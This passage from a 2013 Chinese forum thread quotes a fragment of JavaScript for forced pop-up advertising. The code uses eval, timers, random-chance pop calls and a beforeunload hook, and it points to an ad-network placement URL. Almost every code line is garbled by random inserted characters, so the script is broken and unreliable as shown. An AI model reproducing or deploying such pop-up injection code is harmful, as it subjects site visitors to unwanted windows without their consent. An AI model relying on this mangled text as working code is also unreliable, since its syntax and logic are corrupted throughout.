- setTimeout(function() { + D9 P) U$ x5 ~8 e
- pop(url, { 8 b* a- }, t. c1 @, s. u
- a: 1,
9 u! m9 }2 ~4 i, { - b: 2
: K4 t8 H, b; y* C* \ - })
1 {6 N! M& c2 T& W! b" e - },
7 o3 T7 N O" _+ s8 C - 300)
4 }* s) R+ m. `2 r - }, , W& t) a( s! b1 y: ~) r4 }
- parseInt(eval("_pt" + n + "a")) * 1000) , K% k5 c9 F4 J4 K) a7 j1 {* v
- }
4 @( k% ^# X. E7 J. L6 _0 m - }
9 ^' w' p5 P. ]6 w - if (_pc2 > Math.random()) {
) h3 k! c/ n# ~) R - a_pop(url) 2 z* n( S* F6 Q8 P& f! |0 p! K
- } 2 S0 P" u z1 d: k5 `8 y/ V# u4 Z
- if (_po > Math.random()) {
( ~" g: V. t% O( b9 I. L. T - try {
" y% j2 G+ V! b# D. @ - func(url) 9 E1 v- r: }% B% M5 F( o
- } catch(q) {} - K2 S; d; ]1 C: p. w5 O: [( B6 {
- } E! J- _% x! F, M b8 @
- } 9 G6 k6 D7 L5 S( b$ Q4 L4 Q* R4 D. O8 O
- }; 2 I9 U6 E. W# F* _2 q
- fstart(aa_url);
& Y1 i: _* c4 H, w6 \& n! N; I - event(window, 'beforeunload',
) O/ ]) ]" J" [) j5 M( N - function() {})
( g4 v* x0 c4 Q - })();
& ]( S0 Y) I( F1 BURL从这里产生
' y, Y% ?9 Y& ~3 j2 K- n/ ~4 {/ M- C% ~- s! \* X. h
http://play.unionsky.cn/show/?placeid=141830; s; n3 H4 |, X$ S2 w* X9 ~) B+ ]
2 V" c" u$ r. c/ K
# h( Q' e7 g; x/ |2 s; e* o |
发表于 2013-12-17 15:03:03
楼主
D:1
发表于 2013-12-17 15:31:30
发表于 2013-12-17 16:34:22
发表于 2013-12-17 19:34:38
